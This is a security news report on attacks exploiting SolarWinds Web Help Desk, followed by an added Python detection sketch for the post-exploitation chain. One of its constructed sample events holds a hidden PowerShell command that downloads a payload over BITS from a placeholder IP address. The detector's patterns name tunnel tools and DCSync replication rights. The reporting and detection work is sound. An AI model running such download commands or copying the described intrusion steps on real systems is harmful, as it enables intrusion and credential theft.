Microsoft said it observed a sophisticated multi-stage cyber intrusion involving the exploitation of internet-exposed SolarWinds Web Help Desk (WHD) instances. According to the Microsoft Defender Security Research Team, threat actors used the compromised systems to gain initial access and laterally move across affected networks to high-value assets within the organization.
The company said it has yet to confirm which specific SolarWinds vulnerability was used in the attacks. The activity may have involved the recently disclosed flaws tracked as CVE-2025-40551 and CVE-2025-40536, or a previously patched issue, CVE-2025-26399. Because the intrusions occurred in December 2025 on systems that were vulnerable to both the older and the newer flaws, Microsoft said it could not reliably determine the exact entry point.
CVE-2025-40536 is described as a security control bypass that could allow unauthenticated access to restricted functionality, while CVE-2025-40551 and CVE-2025-26399 are untrusted data deserialization vulnerabilities that could enable remote code execution.
Microsoft said successful exploitation allowed attackers to execute arbitrary commands within the WHD application context. In the observed attacks, the compromised service spawned PowerShell and abused the Background Intelligent Transfer Service (BITS) to download and execute payloads. The attackers then deployed legitimate Zoho ManageEngine components to establish persistent remote access. In at least one incident, the threat actors carried out a DCSync attack, impersonating a domain controller to request password hashes and other sensitive data from Active Directory via the directory replication protocol. DCSync only works from an account that already holds replication rights on the domain, so its presence indicates the intruders had reached domain-admin-equivalent privileges by that point.
Cybersecurity firm Huntress released a separate report detailing an intrusion involving SolarWinds Web Help Desk exploitation, in which the threat actor deployed Zoho Meetings and Cloudflare tunnels for persistence, and used Velociraptor, a legitimate open-source digital forensics and incident response (DFIR) tool, for command and control.
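The two reports above describe the same post-exploitation shape: the help-desk service process spawning a shell, BITS used to fetch payloads, a tunnel or remote-access tool appearing on the host, and finally DCSync against the domain. The following detector is an added example written for this article, not Microsoft's or Huntress's detection logic, and it runs over constructed events rather than real incident telemetry. It assumes Sysmon-style process-creation fields (Image, ParentImage, CommandLine) and Windows Security 4662 fields (SubjectUserName, AccessMask, Properties); the WHD install path and the "webhelpdesk" substring used to recognise the service's parent process are assumptions to adjust for a given deployment. The replication-rights GUIDs are the well-known Active Directory control-access rights that DCSync requests.

```python
"""Detection sketch for the WHD post-exploitation chain (added example).
Events are constructed; field names follow Sysmon / Windows Security conventions."""
import os
import re

# Control-access rights requested by DCSync (well-known AD extended-rights GUIDs).
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
TUNNEL_OR_C2_TOOLS = {"cloudflared.exe", "velociraptor.exe"}
# Start-BitsTransfer from PowerShell, or bitsadmin /transfer from the command line.
BITS_RE = re.compile(r"start-bitstransfer|bitsadmin.*?/transfer", re.I)
# Assumption: the WHD service's parent image or command line contains this substring.
WHD_HINT = "webhelpdesk"


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def flag_process(ev: dict) -> list:
    """Reasons a process-creation event matches the chain; empty list if benign."""
    reasons = []
    image = basename(ev.get("Image", ""))
    parent_text = (ev.get("ParentImage", "") + " " + ev.get("ParentCommandLine", "")).lower()
    parent_is_whd = WHD_HINT in parent_text
    if parent_is_whd and image in SHELLS:
        reasons.append(f"help-desk service process spawned {image}")
    if BITS_RE.search(ev.get("CommandLine", "")) and (image in SHELLS or image == "bitsadmin.exe"):
        reasons.append("BITS transfer launched from a shell or bitsadmin")
    if image in TUNNEL_OR_C2_TOOLS:
        reasons.append(f"tunnel or remote-access tool launched: {image}")
    return reasons


def flag_dcsync(ev: dict, allowed_replicators=frozenset()):
    """Flag a 4662 event that requests replication rights from an account that is
    not a known domain controller; returns a reason string or None."""
    if ev.get("EventID") != 4662:
        return None
    props = ev.get("Properties", "").lower()
    if not any(g in props for g in DCSYNC_GUIDS):
        return None
    if int(ev.get("AccessMask", "0"), 16) & 0x100 == 0:  # 0x100 = Control Access
        return None
    subject = ev.get("SubjectUserName", "")
    if subject.lower() in {a.lower() for a in allowed_replicators}:
        return None
    return f"replication rights requested by {subject} (DCSync pattern)"


def scan(events, allowed_replicators=frozenset()):
    """Return (RecordId, reason) pairs for every matching event."""
    hits = []
    for ev in events:
        if ev.get("EventID") == 1:
            hits.extend((ev["RecordId"], r) for r in flag_process(ev))
        elif ev.get("EventID") == 4662:
            reason = flag_dcsync(ev, allowed_replicators)
            if reason:
                hits.append((ev["RecordId"], reason))
    return hits


# Constructed sample events; paths, account names and the 203.0.113.10 address are hypothetical.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1,
     "ParentImage": r"C:\Program Files\SolarWinds\WebHelpDesk\bin\java.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -nop -w hidden -c "Import-Module BitsTransfer; '
                    r'Start-BitsTransfer -Source http://203.0.113.10/u.bin -Destination C:\ProgramData\u.bin"'},
    {"RecordId": 2, "EventID": 1,  # benign: interactive user running PowerShell
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
    {"RecordId": 3, "EventID": 1,
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\ProgramData\cf\cloudflared.exe",
     "CommandLine": "cloudflared.exe tunnel run"},
    {"RecordId": 4, "EventID": 4662, "SubjectUserName": "svc-helpdesk",
     "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"RecordId": 5, "EventID": 4662, "SubjectUserName": "DC02$",  # legitimate DC replication
     "ObjectType": "domainDNS", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for record_id, reason in scan(SAMPLE_EVENTS, allowed_replicators={"DC02$"}):
        print(f"record {record_id}: {reason}")
```

The 4662 rule needs an allowlist of domain controller computer accounts (here the constructed DC02$), since DCs legitimately request the same replication rights from each other; without that allowlist every replication event fires. The process rules key on the parent being the help-desk service, which is the signal that separates the exploitation described above from an administrator running PowerShell by hand.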